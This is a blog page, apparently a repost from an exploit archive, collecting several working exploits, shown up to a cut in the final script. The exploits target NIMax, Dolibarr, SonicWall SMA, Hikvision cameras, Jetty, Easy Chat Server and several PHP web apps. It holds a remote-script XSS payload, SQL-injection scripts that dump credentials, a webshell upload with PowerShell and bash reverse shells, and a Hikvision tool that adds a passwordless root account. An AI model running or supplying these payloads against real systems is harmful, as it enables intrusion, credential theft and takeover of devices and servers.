Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863121003

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)
# Date: 24/06/2021
# Exploit Author: LinxzSec
# Vulnerability: Local Denial of Service (DoS)
# Vendor Homepage: https://www.ni.com/en-gb.html
# Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB
# Tested Version: 5.3.1f0
# Tested On: Windows 10 Pro x64

'''[ POC ]
1 - Copy printed "AAAAA..." string from "nimax.txt"
2 - Open NIMax.exe
3 - Right click "Remote systems" and press "Create New"
4 - Select "Remote VISA System" and press "Next"
5 - Paste clipboard in "Remote VISA System Address"
6 - Press finish and DoS will occur
'''

buffer = "\x41" * 5000

try:
    f = open("nimax.txt", "w")
    f.write(buffer)
    f.close()
    print("[+] File created!")
except:
    print("[+] File could not be created!")
HireHackking 
# Exploit Title: Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
# Exploit Author: Oscar Gutierrez (m4xp0w3r)
# Date: 18/10/2021
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://github.com/Dolibarr
# Tested on: Ubuntu, LAAMP
# Vendor: Dolibarr
# Version: v14.0.2

# Exploit Description:
# Dolibarr ERP & CRM v14.0.2 suffers from a stored XSS vulnerability in the ticket creation flow that allows a low level user (with full access to the Tickets module) to achieve full permissions. For this attack vector to work, an administrator user needs to copy the text in the "message" box. 
# Instructions:
#1. Insert this payload in the message box when creating a ticket: "><span onbeforecopy="let pwned = document.createElement('script'); pwned.setAttribute('src', 'http://YOURIPGOESHERE/hax.js'); document.body.appendChild(pwned);" contenteditable>test</span>
#
#2. Host this file (Change the extension of the file to js and remove comments) in a remote http location of your preference. 
#NOTE: The user id in /dolibarr/htdocs/user/perms.php?id=2 may vary depending on the installation so you might have to change this. In my case, I had only 2 users, user 2 being the low level user. 
#
#3.Once an administrator user copies the text within the ticket the attack will launch.

function read_body(xhr) {

    var data = xhr.responseXML;
    var tokenizedUrl = data.getElementsByClassName("reposition commonlink")[0].href;
    console.log(tokenizedUrl);
    return tokenizedUrl;

}

function escalatePrivs() {
    var url = read_body(xhr);
    var http = new XMLHttpRequest();
    http.open('GET', url);
    http.onreadystatechange = function() {
            if (this.readyState  === XMLHttpRequest.DONE && this.status === 200) {
                    return;
            }
    };
    http.send(null);
}

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
            read_body(xhr);
            escalatePrivs(xhr);
    }
}
xhr.open('GET', '/dolibarr/htdocs/user/perms.php?id=2', true);
HireHackking 
# Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset
# Description: Overwrite the persistent database, resulting in password reset on reboot.
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22
# Date: 10/19/2021
# Exploit Author: Jacob Baines (@Junior_Baines)
# Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile
# Vendor Homepage: https://www.sonicwall.com/
# Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv
# Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv
# CVE : CVE-2021-20034

curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"
HireHackking 
# Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
# Exploit Author: Chase Comardelle(CASO)
# Date: October 18, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials


#EXAMPLE PAYLOAD - test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;
#EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/ 

import requests
import sys
import urllib3
import pyfiglet 




urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}



def find_clients_usernames(url):
    clients = ""
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
    
        if r.elapsed.total_seconds() > 1:
            clients += chars[i]
            i=0
            position+=1
        else:
            i +=1    
    return clients


def find_db_usernames(url):
    users = ""
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
    
        if r.elapsed.total_seconds() > 1:
            users += chars[i]
            i=0
            position+=1
        else:
            i +=1    
    return users

def find_db_passwords(url):
    passwords = ""
    clientCount = 0
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0

    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)

        if r.elapsed.total_seconds() > 1:
            passwords += chars[i]
            i=0
            position+=1
        else:
            i +=1   

    return passwords

def find_client_passwords(url):
    passwords = ""
    clientCount = 0
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0

    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)

        if r.elapsed.total_seconds() > 1:
            passwords += chars[i]
            i=0
            position+=1
        else:
            i +=1   
 
    return passwords


def create_table(users,passwords):
    
    
    for  i in range(0,len(users)):
       print(users[i]," | ",passwords[i])

def print_header():
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("[*]     Online Motorcycle (Bike) Rental System     [*]")
    print("[*] Unauthenticated Blind Time-Based SQL Injection [*]")
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("\n")
    print(pyfiglet.figlet_format("      CAS0", font = "slant"  ))  

chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
          'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
          'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
          'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
          '8','9','@','#',",",'.']



if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
    except IndexError:
        print("[-] Usage: %s <url>" % sys.argv[0])
        print("[-] Example: %s www.example.com" % sys.argv[0])
        sys.exit(-1)


print_header()
print("[*] RETRIEVING CREDENTIALS NOW [*]")
dbUsernames = find_db_usernames(url)
dbUsernames = dbUsernames.split(",")

dbPasswords = find_db_passwords(url)
dbPasswords = dbPasswords.split(",")

print("[*] DATABASE CREDENTIALS [*]")
create_table(dbUsernames,dbPasswords)

clientUsernames = find_clients_usernames(url)
clientsUsernames = clientUsernames.split(",")

clientPasswords = find_client_passwords(url)
clientPasswords = clientPasswords.split(",")

print("[*] CLIENT CREDENTIALS [*]")
create_table(clientsUsernames,clientPasswords)
HireHackking 
# Exploit Title: NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)
# Date: 24/06/2021
# Exploit Author: LinxzSec
# Vulnerability: Local Denial of Service (DoS)
# Vendor Homepage: https://www.ni.com/en-gb.html
# Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB
# Tested Version: 5.3.1f0
# Tested On: Windows 10 Pro x64

'''[ POC ]
1 - Copy printed "AAAAA..." string from "nimax.txt"
2 - Open NIMax.exe
3 - Drop down "My System" then drop down "Software"
5 - Locate "NI-VISA 5.2" and select it
6 - Open the "VISA Options" tab
7 - Drop down "General settings"
8 - Select "Aliases"
9 - Select "Add alias"
10 - Paste string from "nimax.txt" into "Resource name"
11 - Just put a single character in the alias and press "ok", DoS will occur
'''

buffer = "\x41" * 5000

try:
    f = open("nimax.txt", "w")
    f.write(buffer)
    f.close()
    print("[+] File created!")
except:
    print("[+] File could not be created!")
HireHackking 
# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution
# Date:21/10/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10
# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e

# Vulnerability: Through SQL injection to bypass the login form it is
# possible to upload a malicious file and after use that malicious file to
# execute code in the remote system.
# Proof of Concept:

import requests
import sys
import time


session = requests.Session()
#http_proxy  = "http://127.0.0.1:8080"
#https_proxy = "https://127.0.0.1:8080"

#proxyDict = {"http"  : http_proxy,
#         "https" : https_proxy}

def windows(HPW,host,shell_name):
payload =
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload
#print(payload)
try:
request_rce = requests.get(host2,timeout=8)
except requests.exceptions.ReadTimeout:
pass


def linux(HPL,host,shell_name):
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'
host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload
#print(payload)
try:
request_rce = requests.get(host2,timeout=8)
except requests.exceptions.ReadTimeout:
pass

def main():

host = sys.argv[1]
shell_name = sys.argv[2]
url = host + '/login.php'
values = {'user': "admin",
 'email': "' OR 1 -- -",
         'password': '',
         'btn_login': ""
         }

r = session.post(url, data=values)
cookie = session.cookies.get_dict()['PHPSESSID']

data = { 'btn_web':''}
headers= {'Cookie': 'PHPSESSID='+cookie}



request = session.post(host+ '/manage_website.php', data=data,
headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")})
print("")
print('[*] Your Simple Webshell was uploaded to ' + host +
'/uploadImage/Logo/' + shell_name + '.php' )
print("")
LHOST = input('[+] Enter your LHOST: ')
LPORT = input('[+] Enter your LPORT: ')
print("")
HPW= "'"+LHOST+"'"+','+LPORT
HPL= ""+LHOST+""+'/'+LPORT

print('[+] Option 1: Windows')
print('[+] Option 2: Linux')

option = input('[+] Choose OS: ')

if option == "1":

windows(HPW,host,shell_name)
exit()

elif option == "2":
linux(HPL,host,shell_name)
exit()

else:
print("Please choose Windows or Linux")

main()

#Usage: python3 host shell_name
#Example: python3 http://localhost/clinic shell
HireHackking 
# Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read
# Date: 11 October 2021
# Exploit Author: z4nd3r
# Vendor Homepage: http://www.echatserver.com/
# Software Link: http://www.echatserver.com/
# Version: 3.1
# Tested on: Windows 10 Pro Build 19042, English
#
# Description: 
# The web server allows for directory traversal and reading of arbitrary files on the
#  system, given that the account running the server can access the target file.


Proof-of-concept using Burp:

Request:

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 192.168.50.52
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

----------------------------------------

Response:

HTTP/1.0 200 OK
Date: Thu, 21 Oct 2021 14:55:57 GMT
Server: Easy Chat Server/1.0
Accept-Ranges: bytes
Content-Length: 92
Connection: close
Content-Type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
HireHackking 
# Exploit Title: Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)
# Date: 20/10/2021
# Exploit Author: Ghuliev
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Tested on: Server: Ubuntu

When a user or admin creates a ticket, we can inject javascript code into
ticket.

POST /crm/create-ticket.php HTTP/1.1
Host: IP
Content-Length: 79
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://IP
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP/crm/create-ticket.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,az;q=0.8,ru;q=0.7

subject=aa&tasktype=Select+your+Task+Type&priority=&description=</textarea><script>alert(1)</script>&send=Send
HireHackking 
# Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure 
# Date: 2021-10-21
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.eclipse.org/jetty/
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/
# Version: 9.4.37.v20210219 and 9.4.38.v20210224
# Tested on: Kali Linux
# CVE : CVE-2021-28164

POC #1 - web.xml

GET /%2e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
HireHackking 
# Exploit Title: Hikvision Web Server Build 210702 - Command Injection
# Exploit Author: bashis
# Vendor Homepage: https://www.hikvision.com/
# Version: 1.0
# CVE: CVE-2021-36260
# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html

# All credit to Watchful_IP

#!/usr/bin/env python3

"""
Note:
1)  This code will _not_ verify if remote is Hikvision device or not.
2)  Most of my interest in this code has been concentrated on how to
    reliably detect vulnerable and/or exploitable devices.
    Some devices are easy to detect, verify and exploit the vulnerability,
    other devices may be vulnerable but not so easy to verify and exploit.
    I think the combined verification code should have very high accuracy.
3)  'safe check' (--check) will try write and read for verification
    'unsafe check' (--reboot) will try reboot the device for verification

[Examples]
Safe vulnerability/verify check:
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check

Safe and unsafe vulnerability/verify check:
(will only use 'unsafe check' if not verified with 'safe check')
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot

Unsafe vulnerability/verify check:
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot

Launch and connect to SSH shell:
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell

Execute command:
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"

Execute blind command:
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"

$./CVE-2021-36260.py -h
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
usage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check]
                         [--reboot] [--shell] [--cmd CMD]
                         [--cmd_blind CMD_BLIND] [--noverify]
                         [--proto {http,https}]

optional arguments:
  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --check               Check if vulnerable
  --reboot              Reboot if vulnerable
  --shell               Launch SSH shell
  --cmd CMD             execute cmd (i.e: "ls -l")
  --cmd_blind CMD_BLIND
                        execute blind cmd (i.e: "reboot")
  --noverify            Do not verify if vulnerable
  --proto {http,https}  Protocol used
$
"""

import os
import argparse
import time

import requests
from requests import packages
from requests.packages import urllib3
from requests.packages.urllib3 import exceptions


class Http(object):
    def __init__(self, rhost, rport, proto, timeout=60):
        super(Http, self).__init__()

        self.rhost = rhost
        self.rport = rport
        self.proto = proto
        self.timeout = timeout

        self.remote = None
        self.uri = None

        """ Most devices will use self-signed certificates, suppress any warnings """
        requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

        self.remote = requests.Session()

        self._init_uri()

        self.remote.headers.update({
            'Host': f'{self.rhost}:{self.rport}',
            'Accept': '*/*',
            'X-Requested-With': 'XMLHttpRequest',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',
        })
        """
        self.remote.proxies.update({
            # 'http': 'http://127.0.0.1:8080',
        })
        """

    def send(self, url=None, query_args=None, timeout=5):

        if query_args:
            """Some devices can handle more, others less, 22 bytes seems like a good compromise"""
            if len(query_args) > 22:
                print(f'[!] Error: Command "{query_args}" to long ({len(query_args)})')
                return None

        """This weird code will try automatically switch between http/https
        and update Host
        """
        try:
            if url and not query_args:
                return self.get(url, timeout)
            else:
                data = self.put('/SDK/webLanguage', query_args, timeout)
        except requests.exceptions.ConnectionError:
            self.proto = 'https' if self.proto == 'http' else 'https'
            self._init_uri()
            try:
                if url and not query_args:
                    return self.get(url, timeout)
                else:
                    data = self.put('/SDK/webLanguage', query_args, timeout)
            except requests.exceptions.ConnectionError:
                return None
        except requests.exceptions.RequestException:
            return None
        except KeyboardInterrupt:
            return None

        """302 when requesting http on https enabled device"""

        if data.status_code == 302:
            redirect = data.headers.get('Location')
            self.uri = redirect[:redirect.rfind('/')]
            self._update_host()
            if url and not query_args:
                return self.get(url, timeout)
            else:
                data = self.put('/SDK/webLanguage', query_args, timeout)

        return data

    def _update_host(self):
        if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:
            self.remote.headers.update({
                'Host': self.uri[self.uri.rfind('://') + 3:],
            })

    def _init_uri(self):
        self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))

    def put(self, url, query_args, timeout):
        """Command injection in the <language> tag"""
        query_args = '<?xml version="1.0" encoding="UTF-8"?>' \
                     f'<language>$({query_args})</language>'
        return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)

    def get(self, url, timeout):
        return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)


def check(remote, args):
    """
    status_code == 200 (OK);
        Verified vulnerable and exploitable
    status_code == 500 (Internal Server Error);
        Device may be vulnerable, but most likely not
        The SDK webLanguage tag is there, but generate status_code 500 when language not found
        I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)
        (Issue: Could also be other directory than 'webLib', r/o FS etc...)
    status_code == 401 (Unauthorized);
        Defiantly not vulnerable
    """
    if args.noverify:
        print(f'[*] Not verifying remote "{args.rhost}:{args.rport}"')
        return True

    print(f'[*] Checking remote "{args.rhost}:{args.rport}"')

    data = remote.send(url='/', query_args=None)
    if data is None:
        print(f'[-] Cannot establish connection to "{args.rhost}:{args.rport}"')
        return None
    print('[i] ETag:', data.headers.get('ETag'))

    data = remote.send(query_args='>webLib/c')
    if data is None or data.status_code == 404:
        print(f'[-] "{args.rhost}:{args.rport}" do not looks like Hikvision')
        return False
    status_code = data.status_code

    data = remote.send(url='/c', query_args=None)
    if not data.status_code == 200:
        """We could not verify command injection"""
        if status_code == 500:
            print(f'[-] Could not verify if vulnerable (Code: {status_code})')
            if args.reboot:
                return check_reboot(remote, args)
        else:
            print(f'[+] Remote is not vulnerable (Code: {status_code})')
        return False

    print('[!] Remote is verified exploitable')
    return True


def check_reboot(remote, args):
    """
    We sending 'reboot', wait 2 sec, then checking with GET request.
    - if there is data returned, we can assume remote is not vulnerable.
    - If there is no connection or data returned, we can assume remote is vulnerable.
    """
    if args.check:
        print('[i] Checking if vulnerable with "reboot"')
    else:
        print(f'[*] Checking remote "{args.rhost}:{args.rport}" with "reboot"')
    remote.send(query_args='reboot')
    time.sleep(2)
    if not remote.send(url='/', query_args=None):
        print('[!] Remote is vulnerable')
        return True
    else:
        print('[+] Remote is not vulnerable')
        return False


def cmd(remote, args):
    if not check(remote, args):
        return False
    data = remote.send(query_args=f'{args.cmd}>webLib/x')
    if data is None:
        return False

    data = remote.send(url='/x', query_args=None)
    if data is None or not data.status_code == 200:
        print(f'[!] Error execute cmd "{args.cmd}"')
        return False
    print(data.text)
    return True


def cmd_blind(remote, args):
    """
    Blind command injection
    """
    if not check(remote, args):
        return False
    data = remote.send(query_args=f'{args.cmd_blind}')
    if data is None or not data.status_code == 500:
        print(f'[-] Error execute cmd "{args.cmd_blind}"')
        return False
    print(f'[i] Try execute blind cmd "{args.cmd_blind}"')
    return True


def shell(remote, args):
    if not check(remote, args):
        return False
    data = remote.send(url='/N', query_args=None)

    if data.status_code == 404:
        print(f'[i] Remote "{args.rhost}" not pwned, pwning now!')
        data = remote.send(query_args='echo -n P::0:0:W>N')
        if data.status_code == 401:
            print(data.headers)
            print(data.text)
            return False
        remote.send(query_args='echo :/:/bin/sh>>N')
        remote.send(query_args='cat N>>/etc/passwd')
        remote.send(query_args='dropbear -R -B -p 1337')
        remote.send(query_args='cat N>webLib/N')
    else:
        print(f'[i] Remote "{args.rhost}" already pwned')

    print(f'[*] Trying SSH to {args.rhost} on port 1337')
    os.system(f'stty echo; stty iexten; stty icanon; \
    ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \
    P@{args.rhost} -p 1337')


def main():
    print('[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)')

    parser = argparse.ArgumentParser()
    parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')
    parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')
    parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')
    parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')
    parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')
    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
    parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: "reboot")')
    parser.add_argument(
        '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'
    )
    parser.add_argument(
        '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'
    )
    args = parser.parse_args()

    remote = Http(args.rhost, args.rport, args.proto)

    try:
        if args.shell:
            shell(remote, args)
        elif args.cmd:
            cmd(remote, args)
        elif args.cmd_blind:
            cmd_blind(remote, args)
        elif args.check:
            check(remote, args)
        elif args.reboot:
            check_reboot(remote, args)
        else:
            parser.parse_args(['-h'])
    except KeyboardInterrupt:
        return False


if __name__ == '__main__':
    main()
HireHackking 
# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)
# Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec)
# Date: 2021-10-21
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP + Python 3

# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers
#                with access to the username and md5 hash of any administrators.
# Vulnerable file: /online-course-registration/Online/pincode-verification.php
# Proof of Concept:

#!/usr/bin/python3

import requests
import sys
import string

def exploit(hostname, username, password):
 
   # Building bruteforce list
    pass_list = list(string.ascii_lowercase)
    pass_list += list(range(0,10))
    pass_list = map(str, pass_list)
    pass_list = list(pass_list)

    user_list = pass_list
    user_list += list(string.ascii_uppercase)
    user_list = map(str, user_list)
    user_list = list(user_list)

    session = requests.Session()

    # This URL may change based on the implementation - change as needed
    url = f"{hostname}/online-course-registration/Online/index.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
    data = {"regno": f"{username}", "password": f"{password}", "submit": ''}
    r = session.post(url, headers=headers, data=data)


    print("Admin username:")
    # This range number is pretty arbitrary, so change it to whatever you feel like
    for i in range(1,33):
        counter = 0
        find = False
        for j in user_list:
            # This URL may change based on the implementation - change as needed
            url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
            data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
            a = session.post(url, headers=headers, data=data)
            counter += 1
            if 'Course Enroll' in a.text:
                sys.stdout.write(j)
                sys.stdout.flush()
                break
            elif counter == len(user_list): 
                find = True
                break
        if find:
            break

    print("\n")
    print("Admin password hash:")
    # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed
    for i in range(1,33):
        counter = 0
        find = False
        for j in pass_list:
            url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
